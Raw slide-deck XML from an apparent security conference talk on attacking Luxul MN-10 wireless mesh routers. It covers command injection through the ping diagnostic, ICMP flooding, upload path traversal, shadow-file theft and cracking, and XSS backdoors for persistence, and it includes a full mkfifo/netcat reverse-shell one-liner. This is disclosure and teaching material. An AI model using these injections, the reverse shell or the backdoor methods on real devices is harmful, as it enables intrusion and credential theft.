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6" r:id="rId4"/>
    <p:sldId id="278" r:id="rId5"/>
    <p:sldId id="296" r:id="rId6"/>
    <p:sldId id="292" r:id="rId7"/>
    <p:sldId id="279" r:id="rId8"/>
    <p:sldId id="281" r:id="rId9"/>
    <p:sldId id="280" r:id="rId10"/>
    <p:sldId id="283" r:id="rId11"/>
    <p:sldId id="289" r:id="rId12"/>
    <p:sldId id="282" r:id="rId13"/>
    <p:sldId id="257" r:id="rId14"/>
    <p:sldId id="272" r:id="rId15"/>
    <p:sldId id="284" r:id="rId16"/>
    <p:sldId id="259" r:id="rId17"/>
    <p:sldId id="273" r:id="rId18"/>
    <p:sldId id="274" r:id="rId19"/>
    <p:sldId id="275" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="288" r:id="rId22"/>
    <p:sldId id="267" r:id="rId23"/>
    <p:sldId id="287" r:id="rId24"/>
    <p:sldId id="293" r:id="rId25"/>
    <p:sldId id="270" r:id="rId26"/>
    <p:sldId id="291" r:id="rId27"/>
    <p:sldId id="261" r:id="rId28"/>
    <p:sldId id="258" r:id="rId29"/>
    <p:sldId id="262" r:id="rId30"/>
    <p:sldId id="290" r:id="rId31"/>
    <p:sldId id="266" r:id="rId32"/>
    <p:sldId id="263" r:id="rId33"/>
    <p:sldId id="264" r:id="rId34"/>
    <p:sldId id="265" r:id="rId35"/>
    <p:sldId id="260" r:id="rId36"/>
    <p:sldId id="294" r:id="rId37"/>
    <p:sldId id="271" r:id="rId38"/>
    <p:sldId id="29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8896-3A45-5D1A-6D2D-140DE443B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F266F-F123-D601-DC2A-A1B995A33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09156-B95B-240A-1228-C1801C3C7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4D7D-88DB-4F54-9DCD-C238150324F4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7F66F-337D-24A6-5CAB-6D42B115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5C60E-813B-A8BA-0F24-8A63DBDC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1E6E-CC6E-4D06-814E-224831A7F9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2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EBE0-43B6-8212-7E98-E20CB25E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1A3B2-AD7E-A239-849F-D226A30EB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C6EC9-5A2E-D256-03F5-B924594A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4D7D-88DB-4F54-9DCD-C238150324F4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42867-BA27-00A4-7F61-62767663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AC0FB-817B-85F5-13E7-6950E61C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1E6E-CC6E-4D06-814E-224831A7F9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6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9EC85F-0C5E-1464-DF32-30D6DD71B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F9C53-3489-3727-2284-7410607BA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2622E-77BC-86F5-07E8-6A048C145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4D7D-88DB-4F54-9DCD-C238150324F4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5F63C-CDD4-DC14-46F0-B85D2B7E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F2290-246F-BA2A-6367-E91E95DD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1E6E-CC6E-4D06-814E-224831A7F9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1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AEDE-151B-0A21-6839-00A9DE4F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75238-A8B2-31F7-AE3B-FCE4452A2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9ECC4-4F29-4FB1-7FEB-6E900CD3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4D7D-88DB-4F54-9DCD-C238150324F4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193B8-2F64-B828-EA46-BF950D08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547ED-B9C1-C07C-7644-DC24AD05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1E6E-CC6E-4D06-814E-224831A7F9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7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00E7-5E28-5B95-C6E3-4D30AC9B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9AD9B-B632-2071-2EA3-B7CAF5E3E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3E43D-B3C0-376B-09C5-F559C0D3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4D7D-88DB-4F54-9DCD-C238150324F4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DD8CB-8C38-0A82-D36E-8258CFEF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0C81B-B147-3BE7-DD1C-AEC2F58D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1E6E-CC6E-4D06-814E-224831A7F9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0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2093-3EAB-1684-0166-0B0E1DD4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1260-A4C8-C85A-D85F-134E6E303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18565-A546-7EDC-640E-768D6A58E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F2CCF-F471-A210-D062-887ACEA8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4D7D-88DB-4F54-9DCD-C238150324F4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3A000-1BBD-0584-3B40-F9E31986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CFE23-7D94-80B4-EA61-4C1A2A2A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1E6E-CC6E-4D06-814E-224831A7F9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25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E11DC-1BB9-B2F3-0D03-29D303F0F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6D84A-191B-9DB1-1576-C8B5834AF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35275-A08F-1F1D-D617-5ECD045BC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C61B7-F5EA-B8E8-3198-7D42D9737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9D213B-F629-7D30-709C-26F28C0F3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C8D928-75EE-8C62-063B-E6FA55588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4D7D-88DB-4F54-9DCD-C238150324F4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11E4DD-2EB7-D973-65EC-24BD0674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13210-30B7-D8C5-D3DE-E0F16E3F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1E6E-CC6E-4D06-814E-224831A7F9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2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3CF0-6677-5C0A-169C-1DFDFF1B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74637B-A869-18BE-4A40-54EF9A79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4D7D-88DB-4F54-9DCD-C238150324F4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55447-E614-6A7D-C58A-A8C7DF29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25C61-CCF4-428D-7316-246855F2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1E6E-CC6E-4D06-814E-224831A7F9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7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CE0BA-3442-1C50-7AC8-8F8B500E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4D7D-88DB-4F54-9DCD-C238150324F4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D0534-FECE-F02E-3996-76D9C58A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7148E-0CC4-F3D2-7EC6-F4B82B98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1E6E-CC6E-4D06-814E-224831A7F9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D8470-2C65-B03A-C705-1F9E85FC2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B93A4-B06D-8674-0102-4A880EE3F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0087F-C8DA-12EA-3A43-49D06F292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0D939-228F-AC0A-0E31-490959A4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4D7D-88DB-4F54-9DCD-C238150324F4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32DA2-859F-F5C9-EF91-5B38362B8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D998C-BB1E-B42E-4B4A-B0E4443E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1E6E-CC6E-4D06-814E-224831A7F9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48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22CC-65E7-27C9-F93D-F5D0E799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BD1698-A2C3-062A-1A8B-B6889D943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1657B-29AC-DB11-8EEA-5FDE3645B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840C0-E93C-DEB5-A730-A26A01E97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4D7D-88DB-4F54-9DCD-C238150324F4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FA10D-058A-301C-CEEE-A44AB9FD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DF4B8-76AC-2B5B-FFCA-94068310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1E6E-CC6E-4D06-814E-224831A7F9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1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D08EB6-6231-F005-441C-FAD43EE1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108C9-0C00-0775-89B8-B721EFBD8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EEF7E-0BB8-DB22-A5F4-6146ED890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844D7D-88DB-4F54-9DCD-C238150324F4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34945-59C9-3AD0-689B-AC33EADD6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D5312-2164-DC57-D678-E2F79183D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7D1E6E-CC6E-4D06-814E-224831A7F9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5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5E80-474B-5155-EDDA-0103CFF558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LUXUL Wireless Routers:</a:t>
            </a:r>
            <a:b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Living off the Land inside your AV System!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29846-8EFB-18C6-9AEB-7A1041B70D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Hacking up insecure firmware and exploiting common web application flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DREW GREEN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JOHN RODRIGUEZ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KEN PYLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="457084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9792B0-2929-CF7B-B6D1-5D48232F40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GET HACKING!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5DD4ACD-79B9-A2F1-301D-6E9473D08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off the land like a pro…. *easily*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1377874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CD23-4834-F343-FEA1-747E7D2C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in LotL – Useful Linux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2F04A-A47D-2BDC-B24A-807C19C59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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PWD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whoami</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Tools – Ping, ECHO / CHARGEN protocol, dns queries, telnet, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SH / ASH / BASH - Shell Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>chmod</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MKFIFO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cat / head / tail / echo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78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7729-F6EE-78A6-8F88-33A1D1ED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Insecure Diagnostic Tools – LIVING OFF THE LAND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717E3-E2AB-3D5D-3D7D-36C0753DE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TCP/IP native tools like PING/TRACERT/NSLOOKUP are useful and leveraged by APT Groups, Nation-State Actors, Botnet Operators.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Diagnostic tools and functions are “passed through” to the underlying OS in *many* cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input sanitization is not considered, poorly implemented, or overlooked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fertile hunting ground for exploits, particularly in infrastructure*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Living in the infrastructure is POWERFUL*. Poor monitoring, if any… it all looks “normal-ish.”</a:t>
            </a:r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These can be easily weaponized in their standard implementation!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36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BC33E6-E134-0C71-34C5-A610B687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So.. Where is the problem?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A33EE79D-46B9-5216-6154-0D9EB3D63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03" y="1808383"/>
            <a:ext cx="6958668" cy="4413564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8B225A-63D0-AFD0-D075-4E0752602DBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7704499" y="1982709"/>
            <a:ext cx="41026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PING command fails to adequate sanitize parameters when processing client-controlled requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The webserver is running as ROOT and can be easily identified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using this as an entry point, weaponization and further exploitation was relatively straightforward.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We didn’t stop here. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4198684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D11A-5222-3EE2-5E56-22952E1B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work and why is it so easy?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BB78F7-839A-8CB0-2217-A59303983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2527" y="1791774"/>
            <a:ext cx="7081611" cy="422425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712174-C4C3-7FFF-D56D-E722B7BDBAC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715224" y="2317686"/>
            <a:ext cx="31234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PS command, we can quickly identify a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>core problem:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The webapp is running as root, does not sanitize malicious characters embedded in certain requests. The device uses SH (LotL opportunity) and runs as ROOT!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A simple one liner (;ps ;) will identify all of these issues quickly! INSTANT WIN!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97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34BB-B788-2906-83EC-C69F4989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LotL Attacks! </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>ICMP FLOODING – Large ICMP requests = Network Congestion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56764-0C7E-7B6C-2ACB-4AE35A45B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60960" cy="420398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ICMP Flooding with large packets via a router is hard to detect, expected behavior, and can be distributed across many APs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ICMP floods are powerful because they do not wait for confirmation to flood their target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can use a simple insecure PING command on across a mesh of devices to attack and enumerate internal &amp; external networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even if the RCE / CI gets patched… abusing controls and tools with ideas like this is what you should be thinking about.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Extra Mile: What happens if we leverage other network quirks and behavior?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2" name="Picture 4" descr="What Is an ICMP Flood DDoS Attack? | Akamai">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDB107AD-00F0-68DA-3D32-5BE84944B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653" y="1784208"/>
            <a:ext cx="5848147" cy="328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309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D86D-BFCD-49E3-3707-E4BB4564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Enumerate, Enumerate, Enumerate!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A6C47C4-75A5-862B-6931-FAFC039E9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483" y="1690688"/>
            <a:ext cx="7246956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249FD1-32F8-B352-42EF-86BA54DBEEC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616561" y="1690688"/>
            <a:ext cx="33497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Great enumeration is key to exploit and 0-day development.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple commands like these are hard to detect on an embedded device. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HINT:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Due to the device being network infrastructure devices.. MANY come with diagnostic tools and applications which can be easily abused.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2972903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E548-EC2C-FB3D-64E3-70E26AA4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Explore! There are many reverse shell options.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BCE25-DD4E-B83B-4F61-C7093965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87" y="1620571"/>
            <a:ext cx="5027067" cy="48723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Navigating the file system through this vector can allow you to find a number of entry points into a reverse shell.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Always think of “normal” or innocuous ways to get the job done. Exploit kits are *loud*, LotL is not.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3C80D-6535-6DF4-A393-D740FD3D8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408" y="1357062"/>
            <a:ext cx="6839505" cy="410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09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6A38F-01E7-95A4-E906-1910289C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Reverse shell? Try /USR/BIN – MKFIFO and NC!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68725-9F0D-D86A-B8A6-41C3FDD7F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880" y="5724525"/>
            <a:ext cx="10357919" cy="4524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Do you see anything else in here that may help you LotL in post-exploitation?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D80326-A0B3-1A14-2F81-1FE5F774F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350" y="1133475"/>
            <a:ext cx="88106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23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38A1-7A8E-BFE8-DFDA-7FD048D9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 /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.0.156 9999 &gt;/tmp/f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C0648-DCBD-9199-6976-0D2DDB8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A05D5-8E65-0F14-5A0B-284E4D725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7" y="1825625"/>
            <a:ext cx="12192000" cy="478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0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D8E8C-D8BD-1B96-D49E-B7D212FD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target device?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31253-C7CB-359E-31B7-C15E499E8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3000" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Luxul MN-10 Wireless Mesh Router*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commonly found in professional AV Systems, homes, wireless infrastructure mesh.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r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>Always think ahead: What does it run under the hood.. And why is that important? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032" name="Picture 8" descr="Luxul MN-10 Epic Mesh MU-MIMO Wireless Network System | AV Australia Online">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93075FDE-2C5D-8260-407F-EE8C2AA5F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1541462"/>
            <a:ext cx="425767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072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BC03A4-AF3B-66DE-DAD5-E51CE5388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RCE is awesome.. But loud and it may get patched.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412411-02F0-A96E-91FD-6C35016CF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Let’s look at some other ways to exploit this and establish persistence.. Even beyond patching.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if we don’t need the reverse shell?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if you could do this all with no tools?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08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CD23-4834-F343-FEA1-747E7D2C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 in LotL – Useful Linux Commands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2F04A-A47D-2BDC-B24A-807C19C59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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PWD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whoami</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Tools – Ping, ECHO / CHARGEN protocol, dns queries, telnet, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SH / ASH / BASH - Shell Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>chmod</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MKFIFO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cat / head / tail / echo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24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5BA5-C53A-9240-9A51-6A43F7F2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you tried just grabbing the SHADOW file?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9E25CA0-C28C-9512-3A9D-22D8E0683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846" y="1907106"/>
            <a:ext cx="6348291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8152C6-3626-08F1-1FB6-650AFDFC244A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461727" y="1991762"/>
            <a:ext cx="43185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web server is running as ROOT. This gives you access to the entire filesystem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The shadow file in Linux stores usernames and stored password hashes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See where the hash starts with $1?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHAT DOES THAT MEAN?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(It’s easily cracked! Use HASHCAT!)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19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B9FA-AB6E-C62C-D3B0-B14AF4FF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Rewind back a bit…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FF4C-C4D1-EAAD-DB56-C5585DC8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other ways could we leverage what we have? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Device has persistent storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t bother with reverse shells, we have RCE as a web app service!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User facing – Leverage the webserver for phishing / credential harvesting, persistent access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker may not have their toolset available or want to burn 0-days / IoCs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There may be firewall rules / monitoring.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This *does* have HTTPS (default) and other obfuscation / evasion abuses available. (look for the certs!)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07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810B91-E91E-441A-0D76-B2110978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a little more advanced and weaponize!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AB149-3134-90F5-B271-1BB798225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Scaling exploits and attacks is easy with the right mind set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’re going to show a “simple” exploit here that can be leveraged for pivoting, user compromise, credential harvesting, client-side exploitation.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84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7AA5-1202-DA07-5CF4-1340961E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and *why* did we do this?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4697FFD-10F5-1A94-D851-F8D41D457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88" y="1681807"/>
            <a:ext cx="10439912" cy="4811068"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2334341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DF96-4562-E7C3-0565-9670FF58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Listings Enabled – Make the most of enumeration!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6D7BA-1F20-DAB8-97E2-F29D9A1F3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575772" cy="45389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You can view directory listings via the web app and directory listings*. (Big deal, right?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even if you don’t have admin access, you can always look at what is in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>certain directories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Anything the web server can access via unauthenticated request means… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>you can.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Think about how this can help you later… like after passwords have changed and the patch has been applied.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03275-3BE6-9D6C-DF5A-146D75EDF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649" y="1422262"/>
            <a:ext cx="3386374" cy="449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8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2DB1-6289-EFBE-5C58-97A13D41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are running as root and we are in /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4D792D2-F452-4702-BC18-70ADD9132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571" y="1690688"/>
            <a:ext cx="7252229" cy="4351338"/>
          </a:xfr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97F81AD-AAD4-369C-F89A-9A3C6B71A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22" y="2058737"/>
            <a:ext cx="6268285" cy="384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02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98D3-7BA2-E8B5-8E0A-D8155333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upload an unauthenticated backdoor!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970D221-74D9-BD7F-5519-83A0D6E0B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778" y="1400191"/>
            <a:ext cx="7386686" cy="5092684"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2440571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8FA7-CE99-C194-EBA8-808272CC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14022" cy="160853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simple XSS backdoor: Unauthenticated Persistence and Pivoting into User space / Phishing / Credential Harvesting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0D36F61-694E-51AF-7B0D-893D66350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28" y="2314419"/>
            <a:ext cx="10155067" cy="222916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8675CF-C355-CCCA-AE5A-0B8DB12F99C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662474" y="4543580"/>
            <a:ext cx="104032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lack of HTTP/S headers and other controls make these flaws a powerful pivot in the infrastructure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>You control a webserver bridging multiple networks with no HTTP headers, a “trusted” source, behind a firewall, and can capture traffic traversing multiple networks!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>You have every network tool available and no monitoring on the device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>PERSISTENCE IS KING. You want to own this forever!</a:t>
            </a:r>
          </a:p>
          <a:p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241197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670C-BDA3-847F-7620-D8598010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83AC-213F-EFA5-1E20-586F6403D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74771" cy="44818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Hacking up the LUXUL MN-10 Wireless Mesh Router!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2024, Drew Green discovered an RCE / command injection attack in LUXUL routers. (He’s awesome!)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Drew, John, and Ken worked together on discovering a few more interesting flaws…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1403673-38D5-81F2-FB7F-2DA8FE2E1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71" y="1834955"/>
            <a:ext cx="6235668" cy="32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28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17D0-DCBD-BDD7-3021-B3579E22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CVE-2024- Upload Traversal and Arbitrary File Writing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2FC3001-2B15-83D5-BBBB-3BF052930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792" y="1690688"/>
            <a:ext cx="6334141" cy="260448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B0FF15-7FAC-5241-2089-003CAF268683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660903" y="2127564"/>
            <a:ext cx="48148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upload function used by the web application is insecure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modifying the file name allows you to traverse the file system, place an uploaded file in any location.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web application is running as root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The file type checking / extension checking is poorly implemented.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379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17D0-DCBD-BDD7-3021-B3579E22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CVE-2024- Upload Traversal and Arbitrary File Writing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2FC3001-2B15-83D5-BBBB-3BF052930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6035"/>
            <a:ext cx="10515600" cy="4323824"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1582449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C4E0-090B-7D6C-324E-2496F87D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daemon is running as root and the web application poorly sanitizes the file name.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B8390C5-FA77-F3F9-CB80-DE010529B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7413"/>
            <a:ext cx="10515600" cy="4207761"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2909252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6DEB2-F73A-18E4-54F4-C48F1714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Message? Ignore it!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3C2E705-314D-D276-7195-A4AFDF634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41" y="1939247"/>
            <a:ext cx="8621328" cy="3743847"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
